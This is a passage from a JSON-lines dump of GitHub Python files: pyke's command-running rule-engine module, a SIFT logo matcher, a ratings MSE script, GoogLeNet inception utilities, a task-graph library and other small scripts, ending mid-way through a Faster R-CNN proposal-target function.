stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd= None if cwd_pat is None\n else cwd_pat.as_data(pat_context))\n out, err = process.communicate(stdin)\n return process.returncode, out, err\n\nclass check_command(special_both):\n r'''\n >>> from pyke import pattern, contexts\n >>> class stub(object):\n ... 
def add_fn(self, fn): pass\n >>> cc = check_command(stub())\n >>> ctxt = contexts.simple_context()\n >>> mgr = cc.lookup(ctxt, ctxt, (pattern.pattern_literal(('true',)),))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n >>> mgr = cc.lookup(ctxt, ctxt, (pattern.pattern_literal(('false',)),))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n >>> mgr = cc.prove(ctxt, ctxt, (pattern.pattern_literal(('true',)),))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n '''\n def __init__(self, special_base):\n super(check_command, self).__init__(special_base, 'check_command')\n\n def lookup(self, bindings, pat_context, patterns):\n if len(patterns) < 1: return knowledge_base.Gen_empty\n retcode, out, err = run_cmd(pat_context, patterns[0],\n patterns[1] if len(patterns) > 1\n else None,\n patterns[2] if len(patterns) > 2\n else None)\n if retcode: return knowledge_base.Gen_empty\n return knowledge_base.Gen_once\n\nclass command(special_both):\n r'''\n >>> from pyke import pattern, contexts\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> c = command(stub())\n >>> ctxt = contexts.simple_context()\n >>> mgr = c.lookup(ctxt, ctxt,\n ... (contexts.variable('ans'),\n ... pattern.pattern_literal(('echo', 'hi'))))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n ans: ('hi',)\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n >>> mgr = c.lookup(ctxt, ctxt,\n ... (contexts.variable('ans'),\n ... pattern.pattern_literal(('cat',)),\n ... pattern.pattern_literal(None),\n ... pattern.pattern_literal('line1\\nline2\\nline3\\n')))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n ans: ('line1', 'line2', 'line3')\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n '''\n def __init__(self, special_base):\n super(command, self).__init__(special_base, 'command')\n\n def lookup(self, bindings, pat_context, patterns):\n if len(patterns) < 2: return knowledge_base.Gen_empty\n retcode, out, err = run_cmd(pat_context, patterns[1],\n patterns[2] if len(patterns) > 2\n else None,\n patterns[3] if len(patterns) > 3\n else None)\n if retcode != 0:\n raise subprocess.CalledProcessError(\n retcode,\n ' '.join(patterns[1].as_data(pat_context)))\n def gen():\n mark = bindings.mark(True)\n try:\n outlines = tuple(out.rstrip('\\n').split('\\n'))\n if patterns[0].match_data(bindings, pat_context, outlines):\n bindings.end_save_all_undo()\n yield\n else:\n bindings.end_save_all_undo()\n finally:\n bindings.undo_to_mark(mark)\n\n return contextlib.closing(gen())\n\nclass general_command(special_both):\n r'''\n >>> from pyke import pattern, contexts\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> gc = general_command(stub())\n >>> ctxt = contexts.simple_context()\n >>> ctxt.dump()\n >>> mgr = gc.lookup(ctxt, ctxt,\n ... (contexts.variable('ans'),\n ... 
pattern.pattern_literal(('echo', 'hi'))))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n ans: (0, 'hi\\n', '')\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n '''\n def __init__(self, special_base):\n super(general_command, self).__init__(special_base, 'general_command')\n\n def lookup(self, bindings, pat_context, patterns):\n if len(patterns) < 2: return knowledge_base.Gen_empty\n ans = run_cmd(pat_context, patterns[1],\n patterns[2] if len(patterns) > 2 else None,\n patterns[3] if len(patterns) > 3 else None)\n\n def gen():\n mark = bindings.mark(True)\n try:\n if patterns[0].match_data(bindings, pat_context, ans):\n bindings.end_save_all_undo()\n yield\n else:\n bindings.end_save_all_undo()\n finally:\n bindings.undo_to_mark(mark)\n\n return contextlib.closing(gen())\n\ndef create_for(engine):\n special_base = special_knowledge_base(engine)\n claim_goal(special_base)\n check_command(special_base)\n command(special_base)\n general_command(special_base)\n\n\n","repo_name":"nvitucci/pyke","sub_path":"pyke/special.py","file_name":"special.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"30258896681","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 5 02:30:06 2018\n\n@author: Abhishek Bansal\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom src import constants\n\n\nclass SIFT:\n def __init__(self):\n self.SIFTFeaturesTrain = None\n self.trainLabels = None\n self.sift = cv2.xfeatures2d.SIFT_create()\n self.FLANN_INDEX_KDTREE = 1\n self.index_params = dict(algorithm=self.FLANN_INDEX_KDTREE, trees=5)\n self.search_params = dict() # or pass empty dictionary\n self.flann = cv2.FlannBasedMatcher(self.index_params, self.search_params)\n self.predictions = None\n self.probability = None\n self.numOfLogosPerClass = None\n\n def extractSIFTFeatures(self, image):\n keypoints, descriptors = self.sift.detectAndCompute(image, None)\n return keypoints, descriptors\n\n def countMatchingSIFTFeatures(self, features1, features2):\n matches = self.flann.knnMatch(features1, features2, k=2)\n # ratio test as per Lowe's paper\n count = 0\n for m, n in matches:\n if m.distance < constants.ratioTestLowe * n.distance:\n count += 1\n return count\n\n def predictSIFTFeatures(self, descriptorTest):\n numTrainingExamples = len(self.SIFTFeaturesTrain)\n numLabels = len(self.numOfLogosPerClass)\n count = np.zeros((numLabels,))\n for i in range(numTrainingExamples):\n count[self.trainLabels[i] - 1] += self.countMatchingSIFTFeatures(self.SIFTFeaturesTrain[i], descriptorTest)\n count /= self.numOfLogosPerClass\n return np.argmax(count) + 1, np.amax(count)\n\n def matchFeatures(self, images, saveModel=True):\n self.SIFTFeaturesTrain = []\n self.trainLabels = images.trainLabels\n self.numOfLogosPerClass = images.numOfLogosPerClass\n print(\"Extracting SIFT Features\")\n for image in images.trainImages:\n keypoints, descriptors = self.extractSIFTFeatures(image)\n self.SIFTFeaturesTrain.append(descriptors)\n print(\"Done!\")\n if saveModel:\n np.save(constants.SIFTModelLoc, self.SIFTFeaturesTrain)\n np.save(constants.SIFTLabelLoc, self.trainLabels)\n np.save(constants.SIFTNumOfLogosPerClass, self.numOfLogosPerClass)\n\n self.predictions = []\n self.probability = []\n\n print(\"Predicting Test Images - SIFT\")\n for index, image in enumerate(images.testImages):\n keypoints, descriptorTest = 
self.extractSIFTFeatures(image)\n            x, y = self.predictSIFTFeatures(descriptorTest)\n            self.predictions.append(x)\n            self.probability.append(y)\n        print(\"Done!\")\n\n        return self.predictions, self.probability\n\n    def loadSIFTModel(self):\n        self.SIFTFeaturesTrain = np.load(constants.SIFTModelLoc)\n        self.trainLabels = np.load(constants.SIFTLabelLoc)\n        self.numOfLogosPerClass = np.load(constants.SIFTNumOfLogosPerClass)\n","repo_name":"rektabhi/DocumentLogoIdentification","sub_path":"src/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73722676967","text":"# limitation: expects movie_id to be sorted in ratings_matrix file and predictions_matrix to be sorted by both movie_id and user_id\n\nimport numpy as np\nimport sys\nimport math\n\nif len(sys.argv) != 3:\n    print(\"need 2 arguments\")\n    sys.exit()\n\nusers = set()\nmovies = set()\n\ncurrent_movie_id = -1\nwith open(sys.argv[1], 'r') as ratings_matrix:\n    for line in ratings_matrix:\n        line = line.strip()\n        if line.endswith(':'):\n            current_movie_id = int(line.split(':')[0])\n            continue\n        movies.add(current_movie_id)\n        user_id, _, _ = line.split(\",\")\n        users.add(int(user_id))\n\nprint(\"#users in ratings_matrix: \", len(users))\nprint(\"#movies in ratings_matrix: \", len(movies))\n\n# zero-initialise so unrated cells stay 0: the MSE loop below skips entries\n# equal to 0, and np.empty would leave arbitrary garbage in unwritten cells\nratings_np_matrix = np.zeros([len(users),
len(movies)])\n\nmap_user_id_to_idx = dict()\nsorted_users = sorted(list(users))\n\nfor idx, user in enumerate(sorted_users):\n map_user_id_to_idx[user] = idx\n\n# read original ratings\n\ncol_idx = -1\nprevious_movie_id = -2\ncurrent_movie_id = -1\nwith open(sys.argv[1], 'r') as ratings_matrix:\n for line in ratings_matrix:\n line = line.strip()\n if line.endswith(':'):\n current_movie_id = int(line.split(':')[0])\n continue\n user_id, rating, _ = line.split(\",\")\n user_id = int(user_id)\n rating = float(rating)\n if current_movie_id != previous_movie_id:\n previous_movie_id = current_movie_id\n # already sorted by movie_id so we can just increase index and don't need something like map_user_id_to_idx\n col_idx += 1\n try:\n ratings_np_matrix[map_user_id_to_idx[user_id]][col_idx] = rating\n except Exception as e:\n import pdb;pdb.set_trace()\n\n\n# read predictions\npredictions_np_matrix = np.empty([len(users), len(movies)])\n\nwith open(sys.argv[2], 'r') as predictions_matrix:\n idx = 0\n for line in predictions_matrix:\n if \"real\" in line:\n # skip header line\n continue\n line = line.strip()\n for idx_2, cell in enumerate(line.split(\" \")):\n try:\n predictions_np_matrix[idx][idx_2] = float(cell)\n except Exception as e:\n import pdb;pdb.set_trace()\n idx += 1\n\n\n# compute MSE\nse = 0.0\ncount = 0\n\nfor i in range(len(users)):\n for j in range(len(movies)):\n if ratings_np_matrix[i][j] != 0:\n se += ((ratings_np_matrix[i][j] - predictions_np_matrix[i][j]) ** 2)\n count += 1\n\nmse = se / float(count)\nprint(\"MSE:\", mse)\nprint(\"RMSE:\", math.sqrt(mse))\n","repo_name":"jakob-ed/Collaborative-Filtering-Kafka","sub_path":"scripts/calculate_mse.py","file_name":"calculate_mse.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6389558278","text":"import math\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\n\ndef load_dataset():\n train_dataset = h5py.File('../../datasets/train_signs.h5', \"r\")\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:]) # your train set features\n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:]) # your train set labels\n # print(\"1:train_set_x_orig,shape\"+str(train_set_x_orig.shape))\n # print(\"1:train_set_y_orig,shape\"+str(train_set_y_orig.shape))\n\n test_dataset = h5py.File('../../datasets/test_signs.h5', \"r\")\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:]) # your test set features\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:]) # your test set labels\n # print(\"2:test_set_x_orig,shape\"+str(test_set_x_orig.shape))\n # print(\"2:test_set_y_orig,shape\"+str(test_set_y_orig.shape))\n\n classes = np.array(test_dataset[\"list_classes\"][:]) # the list of classes\n\n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\n# def load_dataset():\n# train_dataset = h5py.File('datasets/flowers/227/flowers_random.h5', \"r\")\n# train_set_x_orig = np.array(train_dataset[\"flowers\"][:]) # your train set features\n# train_set_y_orig = np.array(train_dataset[\"label\"][:]) # your train set labels\n\n# test_dataset = h5py.File('datasets/flowers/227/test_flowers_random.h5', \"r\")\n# test_set_x_orig = np.array(test_dataset[\"flowers\"][:]) # your test set features\n# test_set_y_orig = np.array(test_dataset[\"label\"][:]) # your test set labels\n\n# classes = 
np.array(test_dataset[\"list_classes\"][:]) # the list of classes\n    \n#     train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n#     test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n    \n#     return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\ndef random_mini_batches(X, Y, mini_batch_size = 64, seed = 0):\n    m = X.shape[0] # number of training examples\n    mini_batches = []\n    np.random.seed(seed)\n    \n    # Step 1: Shuffle (X, Y)\n    permutation = list(np.random.permutation(m))\n    shuffled_X = X[permutation,:,:,:]\n    shuffled_Y = Y[permutation,:]\n\n    # Step 2: Partition (shuffled_X, shuffled_Y). Minus the end case.\n    num_complete_minibatches = math.floor(m/mini_batch_size) # number of mini batches of size mini_batch_size in your partitioning\n    for k in range(0, num_complete_minibatches):\n        mini_batch_X = shuffled_X[k * mini_batch_size : k * mini_batch_size + mini_batch_size,:,:,:]\n        mini_batch_Y = shuffled_Y[k * mini_batch_size : k * mini_batch_size + mini_batch_size,:]\n        mini_batch = (mini_batch_X, mini_batch_Y)\n        mini_batches.append(mini_batch)\n    \n    # Handling the end case (last mini-batch < mini_batch_size)\n    if m % mini_batch_size != 0:\n        mini_batch_X = shuffled_X[num_complete_minibatches * mini_batch_size : m,:,:,:]\n        mini_batch_Y = shuffled_Y[num_complete_minibatches * mini_batch_size : m,:]\n        mini_batch = (mini_batch_X, mini_batch_Y)\n        mini_batches.append(mini_batch)\n    \n    return mini_batches\n\ndef convert_to_one_hot(Y, C):\n    Y = np.eye(C)[Y.reshape(-1)].T\n    return Y\n\n# create placeholders\ndef create_placeholder(n_H0, n_W0, n_C0, n_y):\n    X = tf.placeholder(tf.float32, [None, n_H0, n_W0, n_C0], name = \"X\")\n    Y = tf.placeholder(tf.float32, [None,n_y], name = \"Y\")\n    keep_prob = tf.placeholder(tf.float32)\n    return X,Y,keep_prob\n\ndef inception_module_v1(X):\n    Z11 = tf.contrib.layers.conv2d(inputs=X, num_outputs=64, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n    Z21 = tf.contrib.layers.conv2d(inputs=X, num_outputs=64, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n    Z22 = tf.contrib.layers.conv2d(inputs=Z21, num_outputs=128, kernel_size=[3,3], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n    Z31 = tf.contrib.layers.conv2d(inputs=X, num_outputs=32, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n    Z32 = tf.contrib.layers.conv2d(inputs=Z31, num_outputs=32, kernel_size=[5,5], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n    Z41 = tf.contrib.layers.max_pool2d(inputs=X, kernel_size=[3,3], stride=[1,1], padding='SAME') \n    Z42 = tf.contrib.layers.conv2d(inputs=Z41, num_outputs=32, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n    ZX = tf.concat([Z11,Z22,Z32,Z42],3)\n    return ZX\n\n# forward propagation\ndef forward_propagation(X,keep_prob):\n    print(\"X.shape\"+str(X.shape))\n    Z1 = tf.contrib.layers.conv2d(inputs=X, num_outputs=64, kernel_size=[7,7], stride=[2,2], padding='SAME', activation_fn=tf.nn.relu) #kernel_size=[7,7]\n    Z1 = tf.contrib.layers.max_pool2d(inputs=Z1, kernel_size=[3,3], stride=[2,2], padding='SAME') \n\n    Z2 = tf.contrib.layers.conv2d(inputs=Z1, num_outputs=64, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n    Z2 = tf.contrib.layers.conv2d(inputs=Z2, num_outputs=192, kernel_size=[3,3], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n    Z2 = tf.contrib.layers.max_pool2d(inputs=Z2, kernel_size=[3,3], stride=[2,2], padding='SAME') \n\n    I1 = 
inception_module_v1(Z2)#inception (3a)\n    I2 = inception_module_v1(I1)#inception (3b)\n    # I2 = tf.contrib.layers.max_pool2d(inputs=I2, kernel_size=[3,3], stride=[2,2], padding='SAME')\n    I3 = inception_module_v1(I2)#inception (4a)\n    A1 = tf.contrib.layers.avg_pool2d(inputs=I3, kernel_size=[5,5], stride=[3,3], padding='VALID')\n    Z9 = tf.contrib.layers.conv2d(inputs=A1, num_outputs=16, kernel_size=[1,1], stride=[1,1], padding=\"SAME\", activation_fn=tf.nn.relu)\n    Z9 = tf.contrib.layers.flatten(Z9)\n    Z9 = tf.contrib.layers.fully_connected(Z9,64,activation_fn=tf.nn.relu)\n    Z9 = tf.contrib.layers.fully_connected(Z9,6,activation_fn=None)\n\n    I4 = inception_module_v1(I3)#inception (4b)\n    I5 = inception_module_v1(I4)#inception (4c)\n    I6 = inception_module_v1(I5)#inception (4d)\n    A2 = tf.contrib.layers.avg_pool2d(inputs=I6, kernel_size=[5,5], stride=[3,3], padding='VALID')\n    Z15 = tf.contrib.layers.conv2d(inputs=A2, num_outputs=16, kernel_size=[1,1], stride=[1,1], padding=\"SAME\", activation_fn=tf.nn.relu)\n    Z15 = tf.contrib.layers.flatten(Z15)\n    Z15 = tf.contrib.layers.fully_connected(Z15,64,activation_fn=tf.nn.relu)\n    Z15 = tf.contrib.layers.fully_connected(Z15,6,activation_fn=None)\n\n    I7 = inception_module_v1(I6)#inception (4e)\n    # I7 = tf.contrib.layers.max_pool2d(inputs=I7, kernel_size=[3,3], stride=[2,2], padding='SAME')\n    I8 = inception_module_v1(I7)#inception (5a)\n    I9 = inception_module_v1(I8)#inception (5b)\n    A3 = tf.contrib.layers.avg_pool2d(inputs=I9, kernel_size=[7,7], stride=[1,1], padding='VALID')\n    Z22 = tf.contrib.layers.flatten(A3)\n    Z22 = tf.contrib.layers.fully_connected(Z22,6,activation_fn=None)#tf.nn.softmax)\n    print(\"Z22.shape\"+str(Z22.shape))\n    Z22 = 0.3*Z9 + 0.3*Z15 + 0.4*Z22\n    return Z22\n\n# compute loss\ndef compute_loss(Z6,Y):\n    loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits = Z6, labels = Y))\n    return loss ","repo_name":"DoubleYuanL/GoogLeNet_v1","sub_path":"inception_v1_utils.py","file_name":"inception_v1_utils.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30421041805","text":"# Online Python compiler (interpreter) to run Python online.\n# Write Python 3 code in this online editor and run it.\nimport hashlib\nimport random\nimport time\n\nStamp=time.time()\nprint(Stamp)\nblock=[]\n# initializing string\nstr = \"1\"\nblock.append(Stamp)\nblock.append(int(str))\nprint(sum(block))\ngiving_input=\"{}\".format(sum(block))\n\n# encoding the input string using encode()\n# then sending to SHA256()\nresult = hashlib.sha256(giving_input.encode())\n \n# printing the equivalent hexadecimal value.\nprint(\"The hexadecimal equivalent of SHA256 is : \")\nprint(result.hexdigest())\nrandom.seed(result.hexdigest())\nprint(random.random())\n","repo_name":"Sam2636/rnd_cross_chain","sub_path":"hashing_exp.py","file_name":"hashing_exp.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"37945095593","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author: Minh.nguyen\n@Created Date: Sunday August 2, 2015\n\"\"\"\ndef get_test_data_by_sheet_name(path_to_data_file, sheet_name):\n    \"\"\"Get all data from spread sheet file (only *.xlsx)\n\n    Required: the first column is taken as the test case id (a unique attribute) \n    and used as the primary key to look up the test data for that test case\n    \n    Ex: \n        1. 
Spread sheet format:\n        | Test case id (optional title) | header1 (mandatory title) | header2 (mandatory title) |\n        | tc_001 | data01_test01 | data02_test02 |\n        | tc_002 | data01_test02 | data02_test02 |\n\n        2. Return value\n        {\n            'tc_001' : {'header1' : 'data01_test01', 'header2' : 'data02_test02'},\n            'tc_002' : {'header1' : 'data01_test02', 'header2' : 'data02_test02'}\n        }\n\n    \"\"\"\n    \n    from openpyxl import load_workbook\n    from openpyxl import Workbook\n    \n    wb = None\n    ws = None\n    \n    try:\n        wb = load_workbook(path_to_data_file)\n        ws = wb.get_sheet_by_name(sheet_name)\n    except:\n        assert False, \"Could not find excel file located in path: '%s'\" % (path_to_data_file)\n\n    if ws is None:\n        assert False, \"Sheet name '%s' does not exist in excel file \" % (sheet_name)\n\n    # get highest row and column\n    row_count = ws.max_row + 1\n    column_count = ws.max_column + 1\n    \n    test_data = {}\n\n    for row_index in range(2, row_count):\n        current_row_data = {}\n\n        for column_index in range(2, column_count):\n            \n            # get header and use it as a key to find data\n            header = ws.cell(row = 1, column = column_index).value\n            # if header is None, skip this column\n            if header is None:\n                continue\n            else:\n                header = str(header).lower()\n            \n            # get data at column index\n            data = ws.cell(row = row_index, column = column_index).value or \"\"\n\n            \n            current_row_data.update({header:data})\n        # get test case id and use it as the primary key for this row's data\n        test_id = ws.cell(row = row_index, column = 1).value\n        # add row data to test data\n        test_data.update({test_id:current_row_data})\n\n    return test_data\n","repo_name":"minhnguyenphuonghoang/service_cube_automation_testing","sub_path":"Libraries/data_interaction.py","file_name":"data_interaction.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72234710248","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf1=pd.read_csv(\n    'MSFT.csv',\n    parse_dates=['Date'], # convert the string data in the date column into timestamps\n    index_col='Date'\n    )\nprint(df1)\nprint(df1['Close'].resample('M').mean()) # show the mean of the monthly resampling of the close data \nprint(df1['Close'].resample('W').mean()) # show the mean of the weekly resampling of the close data\nprint(df1['Close'].resample('Q').mean()) # show the mean of the quarterly resampling of the close data\nprint(df1['Close'].resample('Y').mean()) # show the mean of the yearly resampling of the close data\n\ndf2=pd.read_csv(\n    'AAPL.csv',\n    parse_dates=['Date'] # convert the string data in the date column into timestamps\n    )\nprint(df2)\n\nplt.plot(\n    df1.index,df1['Adj Close'],'r-',\n    df2['Date'],df2['Adj Close'],'g-'\n)\nplt.xlabel('Tanggal')\nplt.ylabel('$')\nplt.xticks(rotation=65)\nplt.grid(True)\nplt.legend(['Microsoft','Apple'])\nplt.show()","repo_name":"agammsantos/Data-Science-Class-Purwadhika","sub_path":"pertemuan28/pertemuan28microsoft.py","file_name":"pertemuan28microsoft.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72639795048","text":"\"\"\"Task related definitions\"\"\"\n\nclass TaskStatus:\n    \"\"\"Enum for task status\"\"\"\n    Waiting = 'Waiting'\n    Running = 'Running'\n    Success = 'Success'\n    Failure = 'Failure'\n\n\nclass Task:\n    \"\"\"A task consists of a function, its parameters and a name associated with it\"\"\"\n\n    def __init__(self, name, func, args=(), 
kwargs=None):\n        self.name = name\n        self.func = func\n        self.args = args\n        self.kwargs = kwargs or {}\n\n    def run(self):\n        self.func(*self.args, **self.kwargs)\n\n    def __hash__(self):\n        return hash(self.name)\n\n    def __eq__(self, other):\n        return isinstance(other, Task) and self.name == other.name\n\n    def __repr__(self):\n        return 'gtui.Task(name={}, func={!r}, args={!r}, kwargs={!r})'.format(\n            self.name,\n            self.func,\n            self.args,\n            self.kwargs\n        )\n\nclass TaskGraph:\n    \"\"\"A graph containing tasks and their execution dependencies\"\"\"\n\n    def __init__(self):\n        self.tasks = []\n        self.task2waiting_for = {}\n\n    def add_task(self, task, waiting_for=None):\n        \"\"\"Add a task to this graph\n\n        Parameters\n        ----------\n        task : Task\n            a task instance\n        waiting_for : Task or list\n            a task or a list of tasks to wait for\n        \"\"\"\n        if task not in self.tasks:\n            self.tasks.append(task)\n            self.task2waiting_for[task] = []\n\n        if waiting_for:\n            self.add_dependency(task, waiting_for)\n\n    def add_tasks(self, tasks):\n        \"\"\"Add a list of tasks to this graph\"\"\"\n        for t in tasks:\n            self.add_task(t)\n\n    def add_dependency(self, task, waiting_for):\n        \"\"\"Add an execution dependency to this graph\n\n        Parameters\n        ----------\n        task : Task\n            a task instance\n        waiting_for : Task or list\n            a task or a list of tasks to wait for\n        \"\"\"\n        if isinstance(waiting_for, Task):\n            self.task2waiting_for[task].append(waiting_for)\n\n        if isinstance(waiting_for, list):\n            self.task2waiting_for[task] += waiting_for\n\n    def run(self,\n            title='Demo',\n            callback=None,\n            log_formatter=None,\n            exit_on_success=False\n            ):\n        \"\"\"A helper function to run this task graph\n\n        Parameters\n        ----------\n        title : str\n            The title of the TUI, displayed at the bottom left corner.\n        callback : function\n            A function which accepts a boolean indicating whether execution succeeds.\n            It will be called when execution finishes.\n        log_formatter: logging.Formatter\n            An instance of logging.Formatter. Defaults to gtui.utils.default_log_formatter.\n        exit_on_success: boolean\n            Whether to exit the TUI if all tasks succeed. 
Defaults to False.\n\n        Raises\n        ------\n        ValueError\n            If there is a cycle in the graph, the message describes the cycle with task names.\n        \"\"\"\n        from .visualizer import Visualizer\n        from .utils import default_log_formatter\n\n        if not log_formatter:\n            log_formatter = default_log_formatter\n\n        cycle = self.has_cycle()\n        if cycle:\n            raise ValueError('Found cycle in TaskGraph: ' + ' -> '.join([t.name for t in cycle]))\n\n        Visualizer(\n            graph=self,\n            title=title,\n            callback=callback,\n            log_formatter=log_formatter,\n            exit_on_success=exit_on_success\n        ).run()\n\n    def has_task(self, task):\n        \"\"\"Whether a task is in this graph\"\"\"\n        return task in self.tasks\n\n    def has_cycle(self):\n        \"\"\"Returns a list of tasks contained in a cycle if there is one or None if no cycle.\"\"\"\n        cycle = None\n\n        task2visited = {t: False for t in self.tasks}\n        task2on_stack = {t: False for t in self.tasks}\n        task2on_stack_dep = {t: None for t in self.tasks}\n\n        def dfs(t):\n            nonlocal cycle\n            task2visited[t] = True\n            task2on_stack[t] = True\n            for w in self.task2waiting_for[t]:\n                if cycle:\n                    return\n                elif not task2visited[w]:\n                    task2on_stack_dep[t] = w\n                    dfs(w)\n                elif task2on_stack[w]:\n                    cycle = []\n                    v = w\n                    while v != t:\n                        cycle.append(v)\n                        v = task2on_stack_dep[v]\n                    cycle += [t, w]\n            task2on_stack[t] = False\n\n        for t in self.tasks:\n            if not task2visited[t]:\n                dfs(t)\n\n        return cycle\n\n    @classmethod\n    def linear_graph_from_list(cls, tasks):\n        \"\"\"A helper function to create a graph of tasks with linear dependency\"\"\"\n        graph = cls()\n        for t in tasks:\n            graph.add_task(t)\n        for t1, t2 in zip(tasks[:-1], tasks[1:]):\n            graph.add_dependency(t2, waiting_for=t1)\n        return graph\n","repo_name":"CtheSky/gtui","sub_path":"gtui/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"53"}
{"seq_id":"6050298272","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 6 15:20:04 2018\r\n\r\n@author: LongJun\r\n\"\"\"\r\nimport config as cfg\r\nfrom anchor_label import calculate_IOU\r\nimport numpy as np\r\nimport numpy.random as npr\r\ndef proposal_target(rpn_rois, rpn_scores, gt_boxes, _num_classes, gt_cls):\r\n    \"\"\" Fast/Faster rcnn proposal_target layer, used for computing the classification and regression targets\"\"\"\r\n    all_rois = rpn_rois\r\n    all_scores = rpn_scores\r\n    num_images = 1\r\n    rois_per_image = cfg.dect_train_batch/ num_images\r\n    fg_rois_per_image = np.round(cfg.dect_fg_rate* rois_per_image)\r\n    labels, rois, roi_scores, bbox_targets, bbox_inside_weights = _sample_rois(\\\r\n        all_rois, all_scores, gt_boxes, fg_rois_per_image,\\\r\n        rois_per_image, _num_classes, gt_cls)\r\n    rois = rois.reshape(-1, 5) \r\n    roi_scores = roi_scores.reshape(-1) \r\n    labels = labels.reshape(-1, 1) \r\n    bbox_targets = bbox_targets.reshape(-1, _num_classes * 4) \r\n    bbox_inside_weights = bbox_inside_weights.reshape(-1, _num_classes * 4)\r\n    bbox_outside_weights = np.array(bbox_inside_weights > 0).astype(np.float32)\r\n    return rois, roi_scores, labels, bbox_targets, bbox_inside_weights, bbox_outside_weights\r\n    \r\n    \r\ndef _get_bbox_regression_labels(bbox_target_data, num_classes):\r\n    \"\"\" compute the bbox_targets and bbox_inside_weights,\r\n    i.e., tx*, ty*, tw*, th*, and which bbox_targets are used in the loss computation\"\"\"\r\n    clss = bbox_target_data[:, 0]\r\n    bbox_targets = np.zeros((clss.size, 4 * num_classes), dtype=np.float32) \r\n    bbox_inside_weights = np.zeros(bbox_targets.shape, dtype=np.float32)\r\n    inds = np.where(clss 
